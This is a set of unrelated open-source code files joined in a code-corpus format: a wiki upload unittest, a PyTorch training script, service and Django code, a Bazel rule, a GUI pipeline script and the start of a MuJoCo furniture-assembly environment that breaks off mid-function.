        self.uploader.screenshotPath = test.testImages()[0]
        self.uploader.mapCode = "[PASTE URL OF IMAGE HERE test image:%s]" \
            % os.path.basename(self.uploader.screenshotPath)
        if self.error == type(None):  # else it won't be needed
            self.checker.loadWiki(self.url, self.username, self.password)
        self.uploader.username.set(self.username)
        # Bug fix: the anonymized "<PASSWORD>" placeholder was not valid
        # Python; the uploader needs the password collected in __init__.
        self.uploader.password.set(self.password)

    def runTest(self):
        try:
            name = os.path.basename(self.uploader.screenshotPath)
            code = self.uploader.mapCode
            url = self.uploader.userSuppliedURL.get()
            # Bug fix: the original compared self.error against None, but
            # success scenarios store type(None), so the success-path
            # assertions below were unreachable.
            if self.error == type(None):
                self.assertFalse(self.checker.fileExists(name))
                self.assertFalse(self.checker.codeExists(code, url))
                self.uploader.upload()
                self.assertTrue(self.checker.fileExists(name))
                # actual code may change, so check by image name
                self.assertTrue(self.checker.codeExists(name, url))
                self.assertEqual(self.error,
                                 type(self.uploader.lastSuppressed))
            else:
                try:
                    self.uploader.upload()
                    self.assertEqual(self.error,
                                     type(self.uploader.lastSuppressed))
                # "as e" form works on Python 2.6+ and 3 (was "Exception, e")
                except Exception as e:
                    self.assertEqual(self.error, type(e))
                print("%s is right" % self.error.__name__)
        except AssertionError:
            print("%s should be %s"
                  % (type(self.uploader.lastSuppressed), self.error))
            print("details: %s" % self.uploader.lastSuppressed)
            raise SystemExit

    def tearDown(self):
        self.uploader.destroy()
        self.checker.logout()
# Registry of test scenarios per wiki. Each scenario maps a name to a
# (url, username, password, expected-exception-type) tuple consumed by
# MapUploadTest; type(None) marks a scenario expected to succeed.
TEST_WIKIS = {}
JEFFWIKI = TEST_WIKIS["jeffwiki"] = {}
GOLDENBRICKS = TEST_WIKIS["goldenbricks"] = {}
REGISTRY = TEST_WIKIS["registry"] = {}
WIKIPEDIA = TEST_WIKIS["wikipedia"] = {}
# correct urls, usernames, passwords, and resulting exception types
# (credentials are collected interactively at import time)
JEFFWIKI_DEFAULTS = ("http://wikidust.sbolstandard.org/index.php/Sandbox:Unittesting",
                     raw_input("JeffWiki username: "),
                     getpass("JeffWiki password: "), type(None))
GOLDENBRICKS_DEFAULTS = ("https://courses.washington.edu/synbio/goldenbricks/index.php?title=Test_3",
                         raw_input("UW netid username: "),
                         getpass("UW netid password: "), type(None))
REGISTRY_DEFAULTS = ("http://partsregistry.org/wiki/index.php?title=Part:BBa_K314000",
                     raw_input("Registry username: "),
                     getpass("Registry password: "), type(None))
WIKIPEDIA_DEFAULTS = ("http://en.wikipedia.org/wiki/User:Jeffdjohnson/map_code_sandbox2",
                      raw_input("Wikipedia username: "),
                      getpass("Wikipedia password: "), type(None))
# test cases: each wiki gets a success case plus deliberately broken urls,
# missing/partial credentials and locked pages with the expected error type
JEFFWIKI["correct"] = JEFFWIKI_DEFAULTS
JEFFWIKI["locked"] = ("http://wikidust.sbolstandard.org/index.php/Main_Page", "", "", wikibrowser.PageLockedError)
JEFFWIKI["badurl"] = ("tinkercell.com", JEFFWIKI_DEFAULTS[1], JEFFWIKI_DEFAULTS[2], wikibrowser.BadURLError)
JEFFWIKI["wrongurl"] = ("http://www.tinkercell.com", JEFFWIKI_DEFAULTS[1], JEFFWIKI_DEFAULTS[2], wikibrowser.SiteLayoutError)
JEFFWIKI["nologin"] = (JEFFWIKI_DEFAULTS[0], "", "", JEFFWIKI_DEFAULTS[3])
JEFFWIKI["useronly"] = (JEFFWIKI_DEFAULTS[0], JEFFWIKI_DEFAULTS[1], "", wikibrowser.BadLoginError)
JEFFWIKI["passonly"] = (JEFFWIKI_DEFAULTS[0], "", "stuff", wikibrowser.BadLoginError)
JEFFWIKI["baduser"] = (JEFFWIKI_DEFAULTS[0], "jef", JEFFWIKI_DEFAULTS[2], wikibrowser.BadLoginError)
JEFFWIKI["badpass"] = (JEFFWIKI_DEFAULTS[0], JEFFWIKI_DEFAULTS[1], "stuff", wikibrowser.BadLoginError)
GOLDENBRICKS["correct"] = GOLDENBRICKS_DEFAULTS
GOLDENBRICKS["locked"] = ("https://courses.washington.edu/synbio/goldenbricks/index.php?title=Oscillators",
                          GOLDENBRICKS_DEFAULTS[1], GOLDENBRICKS_DEFAULTS[2], wikibrowser.PageLockedError)
GOLDENBRICKS["badurl"] = ("tinkercell.com", GOLDENBRICKS_DEFAULTS[1], GOLDENBRICKS_DEFAULTS[2], wikibrowser.BadURLError)
GOLDENBRICKS["wrongurl"] = ("http://www.tinkercell.com", GOLDENBRICKS_DEFAULTS[1], GOLDENBRICKS_DEFAULTS[2], wikibrowser.SiteLayoutError)
GOLDENBRICKS["nologin"] = (GOLDENBRICKS_DEFAULTS[0], "", "", wikibrowser.BadLoginError)
GOLDENBRICKS["useronly"] = (GOLDENBRICKS_DEFAULTS[0], GOLDENBRICKS_DEFAULTS[1], "", wikibrowser.BadLoginError)
GOLDENBRICKS["passonly"] = (GOLDENBRICKS_DEFAULTS[0], "", GOLDENBRICKS_DEFAULTS[2], wikibrowser.BadLoginError)
GOLDENBRICKS["baduser"] = (GOLDENBRICKS_DEFAULTS[0], "jeff2", GOLDENBRICKS_DEFAULTS[2], wikibrowser.BadLoginError)
GOLDENBRICKS["badpass"] = (GOLDENBRICKS_DEFAULTS[0], GOLDENBRICKS_DEFAULTS[1], "stuff!", wikibrowser.BadLoginError)
REGISTRY["correct"] = REGISTRY_DEFAULTS
REGISTRY["locked"] = ("http://partsregistry.org/wiki/index.php?title=MediaWiki:Monobook.css",  # BE SURE THIS DOESN't WORK!!
                      REGISTRY_DEFAULTS[1], REGISTRY_DEFAULTS[2], wikibrowser.PageLockedError)
REGISTRY["badurl"] = ("www.amazon.com", REGISTRY_DEFAULTS[1], REGISTRY_DEFAULTS[2], wikibrowser.BadURLError)
REGISTRY["wrongurl"] = ("http://amazon.com", REGISTRY_DEFAULTS[1], REGISTRY_DEFAULTS[2], wikibrowser.SiteLayoutError)
REGISTRY["nologin"] = (REGISTRY_DEFAULTS[0], "", "", wikibrowser.BadLoginError)
REGISTRY["useronly"] = (REGISTRY_DEFAULTS[0], REGISTRY_DEFAULTS[1], "", wikibrowser.BadLoginError)
REGISTRY["passonly"] = (REGISTRY_DEFAULTS[0], "", REGISTRY_DEFAULTS[2], wikibrowser.BadLoginError)
REGISTRY["baduser"] = (REGISTRY_DEFAULTS[0], "eljefee", REGISTRY_DEFAULTS[2], wikibrowser.BadLoginError)
REGISTRY["badpass"] = (REGISTRY_DEFAULTS[0], REGISTRY_DEFAULTS[1], "wrongpass", wikibrowser.BadLoginError)
WIKIPEDIA["correct"] = WIKIPEDIA_DEFAULTS
WIKIPEDIA["badurl"] = ("http://com", WIKIPEDIA_DEFAULTS[1], WIKIPEDIA_DEFAULTS[2], wikibrowser.BadURLError)
WIKIPEDIA["wrongurl"] = ("http://ebay.com", WIKIPEDIA_DEFAULTS[1], WIKIPEDIA_DEFAULTS[2], wikibrowser.SiteLayoutError)
WIKIPEDIA["nologin"] = (WIKIPEDIA_DEFAULTS[0], "", "", wikibrowser.BadLoginError)
WIKIPEDIA["useronly"] = (WIKIPEDIA_DEFAULTS[0], WIKIPEDIA_DEFAULTS[1], "", wikibrowser.BadLoginError)
WIKIPEDIA["passonly"] = (WIKIPEDIA_DEFAULTS[0], "", WIKIPEDIA_DEFAULTS[2], wikibrowser.BadLoginError)
WIKIPEDIA["baduser"] = (WIKIPEDIA_DEFAULTS[0], "jhasdghasdjhkasf", WIKIPEDIA_DEFAULTS[2], wikibrowser.BadLoginError)
WIKIPEDIA["badpass"] = (WIKIPEDIA_DEFAULTS[0], WIKIPEDIA_DEFAULTS[1], "notright345u6", wikibrowser.BadLoginError)
WIKIPEDIA["locked"] = ("http://en.wikipedia.org/wiki/Main_Page",
                       WIKIPEDIA_DEFAULTS[1], WIKIPEDIA_DEFAULTS[2], wikibrowser.PageLockedError)
def suite():
    """Interactively build the wiki map-upload test suite.

    For each configured wiki whose "correct" entry has complete credentials,
    the operator is asked whether to include it; every login scenario of an
    accepted wiki becomes one MapUploadTest case.

    NOTE(review): this is Python 2 code (raw_input, print statement).
    """
    suite = unittest.TestSuite()
    for wiki in TEST_WIKIS:
        if "" in TEST_WIKIS[wiki]["correct"][1:3]: # username or password not entered
            continue
        else:
            # Ask the operator whether this wiki should be exercised.
            if raw_input("test %s? " % wiki) == "yes":
                wiki = TEST_WIKIS[wiki]  # rebind loop var to the scenario dict
                for login in wiki:
                    #if login == "correct":
                    #    continue
                    print " adding test case %s" % login
                    login = wiki[login]  # rebind to the (url, user, pass, error) tuple
                    suite.addTest( MapUploadTest(url=login[0], username=login[1], password=login[2], error=login[3]) )
    return suite
def runTests():
    """Build the interactive test suite and execute it in debug mode."""
    test_suite = suite()
    test_suite.debug()
if __name__ == "__main__":
    runTests()
| StarcoderdataPython |
1726023 | <gh_stars>1-10
import argparse
import os
import time
import torch
import torch.optim as optim
import numpy as np
import utils
import Models.CNNs
import Models.NNs
from evaluate import evaluate
from Models.data_loaders import fetch_dataloader
# Set up command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--data_directory', default='01_Data/02_Imagery',
required=True, help='Directory containing the dataset')
parser.add_argument('-o', '--model_output', default='03_Trained_Models',
required=True, help='Directory to output model results')
parser.add_argument('-m', '--model_parameters',
required=True, help='Path to model parameters')
# Define training function
def train(model, optimizer, loss_fn, dataloader, metrics, params, logger):
    """
    Trains model on training data using the parameters specified in the
    params file path for a single epoch
    :param model: (torch.nn.Module)
    :param optimizer: (torch.optim)
    :param loss_fn: a function to compute the loss based on outputs and labels
    :param dataloader: (torch.utils.data.DataLoader) training batches
    :param metrics: (dict) a dictionary including relevant metrics
    :param params: a dictionary of parameters
    :param logger: (utils.Logger) file to output training information
    :return: (float) average training loss for the epoch
    """
    # Set model to train mode (enables dropout / batch-norm updates)
    model.train(mode=True)
    # Set summary lists
    metrics_summary = []
    losses = []
    for i, (train_batch, labels_batch) in enumerate(dataloader):
        # Cast batch to float
        train_batch = train_batch.float()
        # Check for GPU and send variables
        # NOTE(review): `use_cuda` is a module-level global set in __main__,
        # so this function is only usable after that flag has been defined.
        if use_cuda:
            model.cuda()
            train_batch, labels_batch = train_batch.cuda(), labels_batch.cuda()
        # Prepare data: regression targets must be float; 'AQI' targets are
        # class indices and stay integral for the classification loss
        if not 'AQI' in params['output_variable']:
            labels_batch = labels_batch.float()
        # Forward propagation, loss computation and backpropagation
        output_batch = model(train_batch)
        loss = loss_fn(output_batch, labels_batch)
        optimizer.zero_grad()
        loss.backward()
        # Update parameters
        optimizer.step()
        # Log progress and compute statistics every `save_summary_steps` batches
        if i % params['save_summary_steps'] == 0:
            # Convert output_batch and labels_batch to np
            if use_cuda:
                output_batch, labels_batch = output_batch.cpu(), labels_batch.cpu()
            output_batch, labels_batch = output_batch.detach().numpy(), \
                labels_batch.detach().numpy()
            # Compute metrics
            summary_batch = {metric: metrics[metric](output_batch, labels_batch)
                             for metric in metrics}
            summary_batch['loss'] = loss.item()
            metrics_summary.append(summary_batch)
        # Append loss
        losses.append(loss.item())
    # Compute metrics mean and add to logger
    metrics_mean = {metric: np.mean([x[metric] for x in metrics_summary]) for metric in metrics}
    logger.write('[MODEL INFO] Training metrics mean:')
    logger.write_dict(metrics_mean)
    # Compute average loss
    avg_loss = np.mean(losses)
    logger.write("[MODEL INFO] Running average training loss: {:2f}".format(avg_loss))
    return avg_loss
def train_and_evaluate(model, optimizer, loss_fn, train_dataloader,
                       val_dataloader, metrics, params, model_dir, logger,
                       restore_file=None):
    """
    Train the model for ``params['num_epochs']`` epochs, evaluating on the
    validation set after every epoch and checkpointing the best weights.
    :param model: (torch.nn.Module) the model to be trained
    :param optimizer: (torch.optim) optimizer updating the model's parameters
    :param loss_fn: (nn.MSELoss or nn.CrossEntropyLoss)
    :param train_dataloader: (torch.utils.data.DataLoader)
    :param val_dataloader: (torch.utils.data.DataLoader)
    :param metrics: (dict) metrics to be computed
    :param params: (dict) model parameters
    :param model_dir: (str) directory to output model performance/checkpoints
    :param logger: (utils.Logger) file to output training information
    :param restore_file: (str or None) checkpoint path to reload weights from
    :return: None
    """
    train_losses = []
    eval_losses = []
    # Reload weights if specified.  BUGFIX: the original test was
    # ``restore_file != ""`` which also attempted to load a checkpoint when
    # the default ``None`` was passed; a truthiness check covers both cases.
    if restore_file:
        logger.write('[INFO] Restoring weights from file ' + restore_file)
        try:
            utils.load_checkpoint(restore_file, model, optimizer)
        except FileNotFoundError:
            print('[ERROR] Model weights file not found.')
    # Initiate best validation metric (lower is better for RMSE)
    if params['validation_metric'] == 'RMSE':
        best_val_metric = np.Inf
    else:
        best_val_metric = 0.0
    for epoch in range(params['num_epochs']):
        # Train single epoch on the training set
        logger.write('[INFO] Training Epoch {}/{}'.format(epoch + 1, params['num_epochs']))
        train_loss = train(
            model, optimizer, loss_fn, train_dataloader, metrics, params, logger)
        train_losses.append(train_loss)
        # Evaluate single epoch on the validation set
        val_metrics, eval_loss = evaluate(
            model, loss_fn, val_dataloader, metrics, params, logger)
        eval_losses.append(eval_loss)
        val_metric = val_metrics[params['validation_metric']]
        # Determine if model is superior
        if params['validation_metric'] == 'RMSE':
            is_best = val_metric <= best_val_metric
        else:
            is_best = val_metric >= best_val_metric
        # Save weights.  BUGFIX: checkpoints now go to the ``model_dir``
        # parameter instead of the module-level global ``model_output``.
        utils.save_checkpoint(
            state={'epoch': epoch + 1,
                   'state_dict': model.state_dict(),
                   'optim_dict': optimizer.state_dict()},
            is_best=is_best, checkpoint=model_dir)
        # Save superior models
        if is_best:
            logger.write('[INFO] New best {}: {}'.format(
                params['validation_metric'], val_metric))
            best_val_metric = val_metric
            # Save best val metrics
            best_json_path = os.path.join(
                model_dir, 'metrics_val_best_weights.json')
            utils.save_dict(
                {params['validation_metric']: str(val_metric)},
                best_json_path)
        # Save metrics of the most recent epoch
        last_json_path = os.path.join(
            model_dir, 'metrics_val_last_weights.json')
        utils.save_dict(
            {params['validation_metric']: str(val_metric)}, last_json_path)
    # Save learning plot
    utils.plot_learning(train_losses, eval_losses, model_dir)
if __name__ == '__main__':
# Capture parameters from the command line
args = vars(parser.parse_args())
data_directory = args['data_directory']
model_output = args['model_output']
params_file = args['model_parameters']
# Verify parameter file
try:
params = utils.load_dict(params_file)
except FileNotFoundError:
print("[ERROR] Parameter file not found.")
# Use GPU if available
use_cuda = torch.cuda.is_available()
# Set random seed
torch.manual_seed(42)
if use_cuda:
torch.cuda.manual_seed(42)
# Set up logger
logger = utils.Logger(os.path.join(model_output, 'logger.txt'))
# Fetch dataloaders
logger.write('[INFO] Loading the datasets...')
dataloaders = fetch_dataloader(
dataset_types=['train', 'dev'], data_dir=data_directory,
output_variable=params['output_variable'], params=params)
train_dl = dataloaders['train']
val_dl = dataloaders['dev']
logger.write('[INFO] Datasets loaded successfully...')
# Get number of channels / feature size for concat model
no_channels = next(iter(val_dl))[0].shape[1]
# Define model, and fetch loss function and metrics
if 'AQI' not in params['output_variable']:
if params['model_type'] == 'concat':
model = Models.NNs.ConcatNet(feat_size=no_channels, p=params['p_dropout'], out_size=1)
elif params['model_type'] == 'sat' or params['model_type'] == 'street':
model = Models.CNNs.ResNetRegression(
no_channels=no_channels, p=params['p_dropout'],
add_block=params['extra_DO_layer'], num_frozen=params['num_frozen'])
else:
raise Exception('[ERROR] Model type should be in {sat, street, concat}')
loss_fn = Models.CNNs.loss_fn_regression
metrics = Models.CNNs.metrics_regression
else:
if params['model_type'] == 'concat':
model = Models.NNs.ConcatNet(
feat_size=no_channels, p=params['p_dropout'], out_size=params['num_classes'])
elif params['model_type'] == 'sat' or params['model_type'] == 'street':
model = Models.CNNs.ResNetClassifier(
no_channels=no_channels, num_classes=params['num_classes'],
p=params['p_dropout'], add_block=params['extra_DO_layer'],
num_frozen=params['num_frozen'])
else:
raise Exception('[ERROR] Model type should be in {sat, street, concat}')
loss_fn = Models.CNNs.loss_fn_classification
metrics = Models.CNNs.metrics_classification
if use_cuda:
model = model.cuda()
# Define optimizer
optimizer = getattr(optim, params['optimizer'])(
params=model.parameters(), lr=params['learning_rate'])
# Train
logger.write('[INFO] Starting training {} for {} epoch(s)'.format(
params['model_type'], params['num_epochs']))
t0 = time.time()
train_and_evaluate(model, optimizer, loss_fn, train_dl,
val_dl, metrics, params, model_output, logger,
restore_file=params['restore_file'])
logger.write('[INFO] Training completed in {:2f} minute(s)'.format(
(time.time() - t0) / 60))
| StarcoderdataPython |
1641834 | """
Copyright (c) 2016-present, Facebook, Inc.
All rights reserved.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree. An additional grant
of patent rights can be found in the PATENTS file in the same directory.
"""
from lte.protos.mconfig import mconfigs_pb2
from magma.common.service import MagmaService
from magma.configuration import load_service_config
from magma.monitord.icmp_monitoring import ICMPMonitoring
from magma.monitord.icmp_state import serialize_subscriber_states
def main():
    """ main() for monitord service"""
    # Build the service from its MonitorD managed-config proto
    service = MagmaService('monitord', mconfigs_pb2.MonitorD())
    # Monitoring thread loop: pings subscribers over the configured interface
    mtr_interface = load_service_config("monitord")["mtr_interface"]
    icmp_monitor = ICMPMonitoring(service.mconfig.polling_interval,
                                  service.loop, mtr_interface)
    icmp_monitor.start()
    # Register a callback function for GetOperationalStates
    service.register_operational_states_callback(
        lambda: serialize_subscriber_states(
            icmp_monitor.get_subscriber_state()))
    # Run the service loop (blocks until the service is stopped)
    service.run()
    # Cleanup the service
    service.close()
if __name__ == "__main__":
    main()
| StarcoderdataPython |
1752692 | from django.db import models, migrations
class Migration(migrations.Migration):
    """Register the unmanaged Segmentation model and adjust existing fields."""
    dependencies = [
        ('cmsplugin_cascade', '0001_initial'),
    ]
    operations = [
        migrations.CreateModel(
            name='Segmentation',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
            ],
            options={
                'verbose_name': 'Segmentation',
                # managed=False: Django will not create/drop a table for this model.
                'managed': False,
                'verbose_name_plural': 'Segmentation',
            },
            bases=(models.Model,),
        ),
        # NOTE(review): default={} is a shared mutable default (Django would
        # normally recommend default=dict), but migrations record historical
        # state and should not be rewritten retroactively.
        migrations.AlterField(
            model_name='cascadeelement',
            name='glossary',
            field=models.JSONField(default={}, blank=True),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='pluginextrafields',
            name='plugin_type',
            field=models.CharField(max_length=50, verbose_name='Plugin Name', db_index=True),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='sharablecascadeelement',
            name='glossary',
            field=models.JSONField(default={}, blank=True),
            preserve_default=True,
        ),
    ]
| StarcoderdataPython |
1781389 | """
"""
load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive")
def setup_capnproto(name):
    """Registers an http_archive repository for Cap'n Proto 0.9.1.

    Args:
      name: repository name to register the archive under.
    """
    version = "0.9.1"
    http_archive(
        name = name,
        build_file = "@caffeine//third_party/capnp:capnproto.BUILD",
        sha256 = "daf49f794560f715e2f4651c842aaece2d065d4216834c5c3d3254962e35b535",
        strip_prefix = "capnproto-{}".format(version),
        url = "https://github.com/capnproto/capnproto/archive/refs/tags/v{}.tar.gz".format(version),
    )
| StarcoderdataPython |
183002 | <reponame>Techme2911/HacktoberFest19-Algo
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 27 09:09:36 2019
@author: Dell
"""
import math as m
m.pow(2,6)#returns 2**6 as a float (64.0)
m.factorial(6)#returns 6! (720)
m.floor(23.4)#returns the largest integer <= the argument
#in this case 23
m.floor(23)#here also 23
m.fmod(6,4)#returns the remainder when the first arg is divided by the second arg.
m.modf(23.4)#returns the (fractional, integral) parts of the arg.
#here it returns (0.3999999999999986, 23.0)
#the fractional part is imprecise because of binary floating point
area_of_a_circle=m.pi*(m.pow(5,2))#gives u area of a circle of radius 5
circumference_of_circle=m.tau*(5)#gives circumference of a circle of radius 5 (tau = 2*pi)
import random as r
r.random()#returns a random floating point number between 0.0 and 1.0
r.choice([1,2,3,4,5,6])#returns a random value from a sequence
"""
The sequence can be a list tupple dictionary etc.
"""
r.randint(1,9)#both endpoints inclusive
r.randrange(1,20,2)#stop value is exclusive
l=[1,3,5,7,9]
r.shuffle(l)#shuffles the list in place
print(l)
import tensorflow as tf
tf.__version__
| StarcoderdataPython |
3238918 | import unittest
from src.main.serialization.codec.codec import Codec
from src.main.serialization.codec.primitive.intCodec import IntCodec
from src.main.serialization.codec.utils.byteIo import ByteIo
from src.main.serialization.codec.utils.bytes import to_byte
from src.test.serialization.codec.test_codec import TestCodec
class TestIntCodec(TestCodec):
    """Round-trip tests for IntCodec over the full 32-bit signed range."""
    def test_wide_range(self):
        # None plus small values and both 32-bit extremes.
        self.int_seria(None)
        self.int_seria(10)
        self.int_seria(-10)
        self.int_seria(-2147483648)
        self.int_seria(2147483647)
    def int_seria(self, value: "int | None"):
        # Helper: write `value` with a fresh codec, read it back, and
        # assert the round-trip is lossless.
        # NOTE(review): the original annotation was `None or int`, which
        # evaluates to just `int`; replaced with a string annotation.
        codec: Codec[int] = IntCodec(to_byte(12))
        writer: ByteIo = self.writer()
        codec.write(writer, value)
        writer.close()
        reader: ByteIo = self.reader()
        pim: int = codec.read(reader)
        self.assertEqual(value, pim)
        reader.close()
reader.close()
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
1676680 | <filename>gallery/templatetags/random_numbers.py
import random
from django import template
register = template.Library()
@register.simple_tag
def random_int(a, b=None):
    """Return a random integer in [a, b]; with one argument, in [0, a]."""
    if b is None:
        return random.randint(0, a)
    return random.randint(a, b)
| StarcoderdataPython |
1691981 | from rest_framework.authentication import SessionAuthentication, BasicAuthentication
from rest_framework.response import Response
from rest_framework.permissions import IsAuthenticated
from rest_framework.views import APIView
from apprest.serializers.container import CalipsoContainerSerializer
from apprest.services.container import CalipsoContainersServices
class ContainerInfo(APIView):
    """
    get:
    Return the container matching the ``id`` URL keyword argument.
    """
    authentication_classes = (SessionAuthentication, BasicAuthentication)
    permission_classes = (IsAuthenticated,)
    serializer_class = CalipsoContainerSerializer
    pagination_class = None

    def get(self, *args, **kwargs):
        service = CalipsoContainersServices()
        container_id = self.kwargs.get('id')
        container = service.get_container_by_id(cid=container_id)
        # Use a distinct local name so the DRF ``serializer_class`` class
        # attribute is not shadowed inside the view method.
        serializer = CalipsoContainerSerializer(container)
        return Response(serializer.data)
class ActiveContainers(APIView):
    """
    get:
    Return all currently active containers.
    """
    authentication_classes = (SessionAuthentication, BasicAuthentication)
    permission_classes = (IsAuthenticated,)
    serializer_class = CalipsoContainerSerializer
    pagination_class = None

    def get(self, *args, **kwargs):
        service = CalipsoContainersServices()
        containers = service.list_all_active_containers()
        # Distinct local name: avoid shadowing the ``serializer_class``
        # class attribute (copy-paste defect shared by the sibling views).
        serializer = CalipsoContainerSerializer(containers, many=True)
        return Response(serializer.data)
class UserContainers(APIView):
    """
    get:
    Return all containers belonging to the ``username`` URL keyword argument.
    """
    authentication_classes = (SessionAuthentication, BasicAuthentication)
    permission_classes = (IsAuthenticated,)
    serializer_class = CalipsoContainerSerializer
    pagination_class = None

    def get(self, *args, **kwargs):
        service = CalipsoContainersServices()
        username = self.kwargs.get('username')
        containers = service.list_container(username)
        # Distinct local name: avoid shadowing the ``serializer_class``
        # class attribute.
        serializer = CalipsoContainerSerializer(containers, many=True)
        return Response(serializer.data)
| StarcoderdataPython |
1776545 | <filename>scripts/old_gui.py
import sys
from pyqtgraph import QtCore, QtGui
from cognigraph.pipeline import Pipeline
from cognigraph.nodes import sources, processors, outputs
from cognigraph import TIME_AXIS
from cognigraph.gui.window import GUIWindow
app = QtGui.QApplication(sys.argv)
pipeline = Pipeline()
# file_path = r"/home/dmalt/Code/python/real_eyes/Koleno.eeg"
file_path = r"/home/dmalt/Data/cognigraph/data/Koleno.eeg"
# vhdr_file_path = r"/home/dmalt/Code/python/real_eyes/Koleno.vhdr"
# vhdr_file_path = r"/home/dmalt/Data/cognigraph/data/Koleno.vhdr"
# vhdr_file_path = r"/home/dmalt/Data/cognigraph/data/Koleno.fif"
fwd_path = r'/home/dmalt/mne_data/MNE-sample-data/MEG/sample/dmalt_custom-fwd.fif'
source = sources.FileSource(file_path=file_path)
pipeline.source = source
# pipeline.source = sources.LSLStreamSource(stream_name='cognigraph-mock-stream')
# Processors
preprocessing = processors.Preprocessing(collect_for_x_seconds=120)
pipeline.add_processor(preprocessing)
linear_filter = processors.LinearFilter(lower_cutoff=8.0, upper_cutoff=12.0)
pipeline.add_processor(linear_filter)
inverse_model = processors.InverseModel(method='MNE', forward_model_path=fwd_path, snr=1.0)
pipeline.add_processor(inverse_model)
# beamformer = processors.Beamformer(forward_model_path=fwd_path, output_type='activation')
# pipeline.add_processor(beamformer)
envelope_extractor = processors.EnvelopeExtractor()
pipeline.add_processor(envelope_extractor)
# Outputs
global_mode = outputs.ThreeDeeBrain.LIMITS_MODES.GLOBAL
three_dee_brain = outputs.ThreeDeeBrain(limits_mode=global_mode, buffer_length=6)
pipeline.add_output(three_dee_brain)
pipeline.add_output(outputs.LSLStreamOutput())
# pipeline.initialize_all_nodes()
signal_viewer = outputs.SignalViewer()
pipeline.add_output(signal_viewer, input_node=linear_filter)
window = GUIWindow(pipeline=pipeline)
window.init_ui()
window.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint)
window.show()
base_controls = window._controls._base_controls
source_controls = base_controls.source_controls
processors_controls = base_controls.processors_controls
outputs_controls = base_controls.outputs_controls
source_controls.source_type_combo.setValue(source_controls.SOURCE_TYPE_PLACEHOLDER)
linear_filter_controls = processors_controls.children()[0]
envelope_controls = processors_controls.children()[2]
# envelope_controls.disabled.setValue(True)
three_dee_brain_controls = outputs_controls.children()[0]
three_dee_brain_controls.limits_mode_combo.setValue('Global')
three_dee_brain_controls.limits_mode_combo.setValue('Local')
window.initialize()
def run():
    """Advance every node in the (module-level) pipeline by one update tick."""
    pipeline.update_all_nodes()
    # print(pipeline.source._samples_already_read / 500)
timer = QtCore.QTimer()
timer.timeout.connect(run)
frequency = pipeline.frequency
timer.setInterval(1000. / frequency * 10)
source.loop_the_file = False
source.MAX_SAMPLES_IN_CHUNK = 5
# envelope.disabled = True
if __name__ == '__main__':
import sys
timer.start()
timer.stop()
# TODO: this runs when in iPython. It should not.
# Start Qt event loop unless running in interactive mode or using pyside.
# if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
# sys.exit(QtGui.QApplication.instance().exec_())
| StarcoderdataPython |
4832506 | <reponame>METU-KALFA/furniture<gh_stars>0
from env.furniture import FurnitureEnv
import env.transform_utils as T
from collections import OrderedDict
import gym
import numpy as np
import mujoco_py
import os
np.set_printoptions(suppress=True)
class AssemblyEnv(FurnitureEnv):
    """Furniture-assembly environment built on top of FurnitureEnv."""
    # Environment identifier used by the framework.
    name = 'assembly'
    def __init__(self, config):
        # config is expected to carry camera, arena and agent settings.
        super().__init__(config)
        self.threshold = 10 # distance threshold between parts for connecting them
        self._camera_pos = config.camera_pos
        # NOTE(review): `camera_tar_pos` is stored as the camera *rotation*;
        # the naming mismatch is inherited from the config schema — confirm.
        self._camera_rot = config.camera_tar_pos
        self._use_table_arena = config.table_arena
@property
def observation_space(self):
"""
Returns dict where keys are ob names and values are dimensions.
"""
ob_space = OrderedDict()
if self._visual_ob:
ob_space["camera_ob"] = gym.spaces.Box(
low=0,
high=255,
shape=(self._screen_height, self._screen_width, 3),
dtype=np.uint8,
)
if self._object_ob:
# can be changed to the desired number depending on the task
ob_space["object_ob"] = gym.spaces.Box(
low=-np.inf,
high=np.inf,
shape=((3 + 4) * 2,),
)
if self._subtask_ob:
ob_space["subtask_ob"] = gym.spaces.Box(
low=0.0,
high=np.inf,
shape=(2,),
)
return gym.spaces.Dict(ob_space)
@property
def action_size(self):
"""
Returns size of the action space.
"""
return gym.spaces.flatdim(self.action_space)
@property
def action_space(self):
# Instead of ActionSpec class
# use gym.spaces.Dict
# simpler, less code to track,
# better for stable baselines
# Dict is not supported by stable_baselines yet.
# Use simpler action_space
return gym.spaces.Box(
shape=(self.dof,),
low=-1,
high=1,
dtype=np.float32,
)
def step(self, action):
"""
Computes the next environment state given @action.
Stores env state for demonstration if needed.
Returns observation dict, reward float, done bool, and info dict.
"""
self._before_step()
if isinstance(action, list):
action = {key: val for ac_i in action for key, val in ac_i.items()}
if isinstance(action, dict):
action = np.concatenate([action[key] for key in self.action_space.spaces.keys()])
ob, reward, done, info = self._step(action)
done, info, penalty = self._after_step(reward, done, info)
if self._record_demo:
self._store_qpos()
self._demo.add(action=action)
return ob, reward + penalty, done, info
def _step(self, a):
"""
Internal step function. Moves agent, updates unity, and then
returns ob, reward, done, info tuple
"""
if a is None:
a = np.zeros(self.dof)
if self._agent_type == 'Cursor':
self._step_discrete(a)
self._do_simulation(None)
elif self._agent_type != 'Cursor' and self._control_type == 'ik':
self._step_continuous(a)
elif self._control_type == 'torque':
raise NotImplementedError
self._do_simulation(a)
elif self._control_type == 'impedance':
a = self._setup_action(a)
self._do_simulation(a)
else:
raise ValueError
ob = self._get_obs()
done = False
# use icp here
# if self._num_connected == len(self._object_names) - 1:
# self._success = True
# done = True
reward = 0
info = {}
return ob, reward, done, info
    def _modify_eq_data(self, part1, part2):
        """Update the weld-equality data for (part1, part2) so that their
        current relative pose becomes the enforced pose.

        The eq_data layout written here is [pos_x, pos_y, pos_z, quat_w,
        quat_x, quat_y, quat_z]; the quaternion is reordered from the
        (x, y, z, w) layout returned by the pose helper.
        """
        # First pass: determine the ordering of the constraint, i.e. whether
        # part1 is stored as obj1 ("left") or as obj2.
        left = False
        for i, (id1, id2) in enumerate(zip(self.sim.model.eq_obj1id, self.sim.model.eq_obj2id)):
            id1_name = self.sim.model.body_id2name(id1)
